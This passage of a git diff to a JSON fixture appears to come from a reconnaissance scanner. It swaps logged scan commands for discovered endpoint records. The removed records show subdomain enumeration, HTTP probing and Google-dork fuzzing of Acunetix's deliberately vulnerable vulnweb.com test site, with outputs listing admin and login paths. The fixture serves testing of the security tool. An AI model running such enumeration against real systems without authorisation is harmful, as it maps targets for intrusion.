"error_message": null, - "traceback": null, - "celery_id": "e1351fcc-958c-4fd2-941b-e8c34c3db9d9" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/handlebars.min.js?v=1596328981612", + "content_length": 72642, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:14.634Z", + "response_time": 0.29588674, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 12, + "model": "startScan.endpoint", + "pk": 64, "fields": { - "scan_of": 1, - "title": "Nuclei Scan with severity info", - "name": "nuclei_individual_severity_module", - "time": "2024-09-03T22:16:51.232Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "e61a5153-22d3-4890-984c-c45177e93baa" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/jquery.min.js?v=1600695504196", + "content_length": 85634, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:14.722Z", + "response_time": 0.302497764, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 13, + "model": "startScan.endpoint", + "pk": 65, "fields": { - "scan_of": 1, - "title": "Nuclei Scan with severity low", - "name": "nuclei_individual_severity_module", - "time": "2024-09-03T22:08:56.115Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "267cc8e5-24ab-4651-a708-4286b4506ee0" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/handlebars.min.js?v=1600695504196", + "content_length": 72642, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:14.809Z", + "response_time": 0.313642082, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 14, + "model": "startScan.endpoint", + "pk": 66, "fields": { - "scan_of": 1, - "title": "Nuclei Scan with severity medium", - "name": "nuclei_individual_severity_module", - "time": "2024-09-03T22:28:15.118Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "47b90b12-ecce-49c9-93cf-f1e26fc15db6" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/text/javascript", + "content_length": 881, + "page_title": "Page Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:15.214Z", + "response_time": 0.200043082, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 15, + "model": "startScan.endpoint", + "pk": 67, "fields": { - "scan_of": 1, - "title": "Nuclei Scan with severity high", - "name": "nuclei_individual_severity_module", - "time": "2024-09-03T22:29:10.920Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "06e12924-022d-4972-8b4b-ceda9b6985f2" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/require.min.js", + "content_length": 15862, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:15.468Z", + "response_time": 0.196933291, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 16, + "model": "startScan.endpoint", + "pk": 68, "fields": { - "scan_of": 1, - "title": "Nuclei Scan with severity critical", - "name": "nuclei_individual_severity_module", - "time": "2024-09-03T22:06:56.220Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "3f932d02-9beb-4c0b-9cb0-394fc6e73401" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/prettify/prettify.js?v=1596328981612", + "content_length": 15307, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:22.371Z", + "response_time": 0.18688370499999998, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 1, + "model": "startScan.endpoint", + "pk": 69, "fields": { "scan_history": 1, - "activity": null, - "command": "httpx -cl -ct -rt -location -td -websocket -cname -asn -cdn -probe -random-agent -t 1 -json -u testphp.vulnweb.com -silent", - "return_code": 0, - "output": "{\"timestamp\":\"2024-09-03T21:25:56.985783616Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com\",\"input\":\"testphp.vulnweb.com\",\"title\":\"Home of Acunetix Art\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"343.388749ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":514,\"lines\":110,\"status_code\":200,\"content_length\":4958,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n", - "time": "2024-09-03T21:25:45.871Z" + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/prettify/prettify.js?v=1600695504196", + "content_length": 15307, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:22.544Z", + "response_time": 0.18595155800000002, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 2, + "model": "startScan.endpoint", + "pk": 70, "fields": { "scan_history": 1, - "activity": null, - "command": "rm /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/httpx_input.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:25:57.045Z" + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/favicon.ico", + "content_length": 881, + "page_title": "Page Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:22.635Z", + "response_time": 0.20779169, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 3, + "model": "startScan.endpoint", + "pk": 71, "fields": { - "scan_history": null, - "activity": null, - "command": "geoiplookup 44.228.249.3", - "return_code": null, - "output": null, - "time": "2024-09-03T21:25:57.037Z" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/semver.min.js?v=1596328982883", + "content_length": 12950, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:22.735Z", + "response_time": 0.187065178, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 4, + "model": "startScan.endpoint", + "pk": 72, "fields": { "scan_history": 1, - "activity": null, - "command": "httpx -cl -ct -rt -location -td -websocket -cname -asn -cdn -probe -random-agent -t 1 -json -u vulnweb.com -silent", - "return_code": 0, - "output": "{\"timestamp\":\"2024-09-03T21:26:08.122014174Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com\",\"input\":\"vulnweb.com\",\"title\":\"Acunetix Web Vulnerability Scanner - Test websites\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/\",\"time\":\"351.001638ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":482,\"lines\":74,\"status_code\":200,\"content_length\":4018,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n", - "time": "2024-09-03T21:25:57.079Z" + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/semver.min.js?v=1596328981612", + "content_length": 12950, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:22.824Z", + "response_time": 0.196353152, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 5, + "model": "startScan.endpoint", + "pk": 73, "fields": { "scan_history": 1, - "activity": null, - "command": "rm /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/httpx_input.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:26:08.160Z" + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/semver.min.js?v=1600695504196", + "content_length": 12950, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:22.913Z", + "response_time": 0.193625418, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 6, + "model": "startScan.endpoint", + "pk": 74, "fields": { "scan_history": 1, - "activity": 1, - "command": "subfinder -d vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/subdomains_subfinder.txt -timeout 5 -t 30 -silent", - "return_code": 0, - "output": "\n[\u001b[34mINF\u001b[0m] Current subfinder version v2.6.6 (\u001b[92mlatest\u001b[0m)\nblogger.com.vulnweb.com\nodincovo.vulnweb.com\ntestasp.vulnweb.com\nwww.testphp.vulnweb.com\ntestphp.vulnweb.com\n2ftestasp.vulnweb.com\nedu-rost.rutestasp.vulnweb.com\nu003erest.vulnweb.com\ntestaspnet.vulnweb.com\ntetphp.vulnweb.com\nrest.vulnweb.com\ntestaspx.vulnweb.com\n5burl-3dhttp-3a-2f-2fwww.vulnweb.com\n7ctestasp.vulnweb.com\nwww.test.php.vulnweb.com\nedu-rost.ruwww.vulnweb.com\ntesthtml5.vulnweb.com\nwww.virus.vulnweb.com\nu003etestasp.vulnweb.com\ntest.php.vulnweb.com\ntestap.vulnweb.com\nwww.testasp.vulnweb.com\nestphp.vulnweb.com\ntestapsnet.vulnweb.com\nhttptestaspnet.vulnweb.com\n2f-2fwww.vulnweb.com\nrestasp.vulnweb.com\nviruswall.vulnweb.com\nvirus.vulnweb.com\nttestphp.vulnweb.com\nwww.vulnweb.com\ntest.vulnweb.com\ntestaps.vulnweb.com\n2fwww.vulnweb.com\nantivirus1.vulnweb.com\ntestpphp.vulnweb.com", - "time": "2024-09-03T21:26:08.233Z" + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/index", + "content_length": 285, + "page_title": "404 Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:23.078Z", + "response_time": 0.185688416, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 7, + "model": "startScan.endpoint", + "pk": 75, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t vulnweb.com -d 3 -p 5 -w /login/,login.html -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\n===================================================================\nDirectories and files found from: \u001b[1m/login/,login.html\u001b[0m\n===================================================================\n\nhttp://rest.vulnweb.com/basic_authentication/api/\nhttp://rest.vulnweb.com/docs/\nhttp://testasp.vulnweb.com/Search.asp\nhttp://testaspnet.vulnweb.com/login.aspx\nhttp://testhtml5.vulnweb.com/\nhttp://testphp.vulnweb.com/\nhttp://testphp.vulnweb.com/admin/\nhttp://testphp.vulnweb.com/artists.php\nhttp://testphp.vulnweb.com/artists.php?artist\nhttp://testphp.vulnweb.com/artists.php?artist=1\nhttp://testphp.vulnweb.com/artists.php?artist=2\nhttp://testphp.vulnweb.com/categories.php\nhttp://testphp.vulnweb.com/disclaimer.php\nhttp://testphp.vulnweb.com/listproducts.php?cat\nhttp://testphp.vulnweb.com/listproducts.php?cat=1\nhttp://testphp.vulnweb.com/login.php\nhttp://testphp.vulnweb.com/search.php\nhttp://www.vulnweb.com/", - "time": "2024-09-03T21:26:08.250Z" + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/id", + "content_length": 881, + "page_title": "Page Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:23.169Z", + "response_time": 0.209178026, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 8, + "model": "startScan.endpoint", + "pk": 76, "fields": { "scan_history": 1, - "activity": 1, - "command": "ctfr -d vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/subdomains_ctfr.txt && cat /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/subdomains_ctfr.txt | sed 's/\\*.//g' | tail -n +12 | uniq | sort > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/subdomains_ctfr.txt", - "return_code": 0, - "output": "\n\n____ _____ _____ ____\n/ ___|_ _| ___| _ \\\n| | | | | |_ | |_) |\n| |___ | | | _| | _ <\n\\____| |_| |_| |_| \\_\\\n\nVersion 1.2 - Hey don't miss AXFR!\nMade by Sheila A. Berta (UnaPibaGeek)\n\n\n[!] ---- TARGET: vulnweb.com ---- [!]\n\n\n\n[!] Done. Have a nice day! ;).", - "time": "2024-09-03T21:26:10.094Z" + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/webfontloader.js?v=1596328981612", + "content_length": 12509, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:23.272Z", + "response_time": 0.188174747, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 9, + "model": "startScan.endpoint", + "pk": 77, "fields": { "scan_history": 1, - "activity": 1, - "command": "sublist3r -d vulnweb.com -t 30 -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/subdomains_sublister.txt", - "return_code": 0, - "output": "\n\u001b[91m\n____ _ _ _ _ _____\n/ ___| _ _| |__ | (_)___| |_|___ / _ __\n\\___ \\| | | | '_ \\| | / __| __| |_ \\| '__|\n___) | |_| | |_) | | \\__ \\ |_ ___) | |\n|____/ \\__,_|_.__/|_|_|___/\\__|____/|_|\u001b[0m\u001b[93m\n\n# Coded By Ahmed Aboul-Ela - @aboul3la\n\n\u001b[94m[-] Enumerating subdomains now for vulnweb.com\u001b[0m\n\u001b[92m[-] Searching now in Baidu..\u001b[0m\n\u001b[92m[-] Searching now in Yahoo..\u001b[0m\n\u001b[92m[-] Searching now in Google..\u001b[0m\n\u001b[92m[-] Searching now in Bing..\u001b[0m\n\u001b[92m[-] Searching now in Ask..\u001b[0m\n\u001b[92m[-] Searching now in Netcraft..\u001b[0m\n\u001b[92m[-] Searching now in DNSdumpster..\u001b[0m\n\u001b[92m[-] Searching now in Virustotal..\u001b[0m\n\u001b[92m[-] Searching now in ThreatCrowd..\u001b[0m\n\u001b[92m[-] Searching now in SSL Certificates..\u001b[0m\n\u001b[92m[-] Searching now in PassiveDNS..\u001b[0m\n\u001b[91m[!] Error: Virustotal probably now is blocking our requests\u001b[0m", - "time": "2024-09-03T21:26:11.036Z" + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/webfontloader.js?v=1600695504196", + "content_length": 12509, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:23.363Z", + "response_time": 0.196629521, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 10, + "model": "startScan.endpoint", + "pk": 78, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t vulnweb.com -d 3 -p 5 -w /admin/,admin.html -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\n===================================================================\nDirectories and files found from: \u001b[1m/admin/,admin.html\u001b[0m\n===================================================================\n\nhttp://rest.vulnweb.com/basic_authentication/api/\nhttp://rest.vulnweb.com/docs/\nhttp://rest.vulnweb.com/images/1_basic_authentication.png\nhttp://rest.vulnweb.com/images/2_jwt.png\nhttp://rest.vulnweb.com/images/3_oauth2.png\nhttp://testphp.vulnweb.com/admin/\nhttp://testphp.vulnweb.com/login.php\nhttp://testphp.vulnweb.com/secured/phpinfo.php", - "time": "2024-09-03T21:26:12.068Z" + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/robots.txt", + "content_length": 881, + "page_title": "Page Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:23.457Z", + "response_time": 0.213280996, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 11, + "model": "startScan.endpoint", + "pk": 79, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t vulnweb.com -d 3 -p 5 -w /dashboard/,dashboard.html -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found.", - "time": "2024-09-03T21:26:15.816Z" + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/section", + "content_length": 881, + "page_title": "Page Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:23.560Z", + "response_time": 0.203838917, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 12, + "model": "startScan.endpoint", + "pk": 80, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t stackoverflow.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mstackoverflow.com\u001b[0m\n\nSorry, no results found.", - "time": "2024-09-03T21:26:16.663Z" + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/text/javascript", + "content_length": 29, + "page_title": null, + "http_status": 400, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:23.665Z", + "response_time": 0.197706942, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 13, + "model": "startScan.endpoint", + "pk": 81, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t tiktok.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mtiktok.com\u001b[0m\n\nSorry, no results found.", - "time": "2024-09-03T21:26:17.334Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/–", + "content_length": 1245, + "page_title": "404 - File or directory not found.", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:23.870Z", + "response_time": 0.348104406, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 14, + "model": "startScan.endpoint", + "pk": 84, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t facebook.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mfacebook.com\u001b[0m\n\n===================================================================\nDirectories and files found from: \u001b[1mvulnweb.com\u001b[0m\n===================================================================\n\nhttps://m.facebook.com/QwertyAloneC/posts/dork-sqli-just-add-inurl-before-themphpcatidcartphpidphpcidindexphpshowtopiccont/142828509609539/\nhttps://m.facebook.com/groups/3201261889909211/posts/3624197390948990/\nhttps://m.facebook.com/groups/3201261889909211/posts/4007010936000965/\nhttps://m.facebook.com/groups/3201261889909211/posts/4007311169304275/\nhttps://m.facebook.com/groups/3201261889909211/posts/4188319924536731/\nhttps://m.facebook.com/groups/3201261889909211/posts/4367877359914319/\nhttps://m.facebook.com/groups/3201261889909211/posts/6293716407330395/\nhttps://m.facebook.com/groups/hackingteam2022/posts/2726773620796174/\nhttps://www.facebook.com/KaliLinuxBrazil/photos/tenha-certeza-de-estar-com-o-tor-instaladoinstala%C3%A7%C3%A3o-tor-rootkaliapt-get-install/972928206082146/\nhttps://www.facebook.com/KaliLinuxBrazil/photos/tenha-certeza-de-estar-com-o-tor-instaladoinstala&C3&A7&C3&A3o-tor-rootkaliapt-get-install/972928206082146/\nhttps://www.facebook.com/groups/3201261889909211/", - "time": "2024-09-03T21:26:18.037Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Default.asp", + "content_length": 3539, + "page_title": "acuforum forums", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:24.195Z", + "response_time": 0.354153758, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 15, + "model": "startScan.endpoint", + "pk": 85, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t twitter.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mtwitter.com\u001b[0m\n\n===================================================================\nDirectories and files found from: \u001b[1mvulnweb.com\u001b[0m\n===================================================================\n\nhttps://mobile.twitter.com/MrHades2020\nhttps://twitter.com/0xSwayamm\nhttps://twitter.com/7h3r4bb17\nhttps://twitter.com/SadatTamzit\nhttps://twitter.com/deathpoolx1\nhttps://twitter.com/hunterabubakar\nhttps://twitter.com/kg4409\nhttps://twitter.com/ravidutt04?lang\nhttps://twitter.com/ravidutt04?lang=ca\nhttps://twitter.com/therceman/status/1711473903934054427\nhttps://twitter.com/vishack81", - "time": "2024-09-03T21:26:21.869Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Images/logo.gif", + "content_length": 4933, + "page_title": null, + "http_status": 200, + "content_type": "image/gif", + "discovered_date": "2024-11-13T02:15:24.309Z", + "response_time": 0.346483883, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 16, + "model": "startScan.endpoint", + "pk": 87, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t youtube.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1myoutube.com\u001b[0m\n\n===================================================================\nDirectories and files found from: \u001b[1mvulnweb.com\u001b[0m\n===================================================================\n\nhttps://m.youtube.com/watch?v\nhttps://m.youtube.com/watch?v=2_lswM1S264\nhttps://m.youtube.com/watch?v=2tJgPyRITGc\nhttps://m.youtube.com/watch?v=6FDKHewTP4A\nhttps://m.youtube.com/watch?v=cEoPdpVUeyU\nhttps://m.youtube.com/watch?v=gHkGuVb9vX8\nhttps://www.youtube.com/watch?v\nhttps://www.youtube.com/watch?v=IbDAHDSlgYg\nhttps://www.youtube.com/watch?v=ZstyFyfS3g4\nhttps://www.youtube.com/watch?v=cEoPdpVUeyU\nhttps://www.youtube.com/watch?v=dabm-7CcHaE\nhttps://www.youtube.com/watch?v=tAxMpoKkvCw", - "time": "2024-09-03T21:26:25.626Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp", + "content_length": 3194, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:24.511Z", + "response_time": 0.351035928, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 17, + "model": "startScan.endpoint", + "pk": 88, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t reddit.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mreddit.com\u001b[0m\n\n===================================================================\nDirectories and files found from: \u001b[1mvulnweb.com\u001b[0m\n===================================================================\n\nhttps://www.reddit.com/r/sysadmin/comments/gs031c/how_to_login_to_web_by_submitting_username/", - "time": "2024-09-03T21:26:29.388Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F", + "content_length": 3198, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:24.636Z", + "response_time": 0.352841818, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 18, + "model": "startScan.endpoint", + "pk": 89, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t trello.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mtrello.com\u001b[0m\n\nSorry, no results found.", - "time": "2024-09-03T21:26:33.059Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3FCookie%3A", + "content_length": 3216, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:24.753Z", + "response_time": 0.35078723100000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 19, + "model": "startScan.endpoint", + "pk": 90, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t atlassian.net -d 3 -p 2 -w vulnweb.com -o 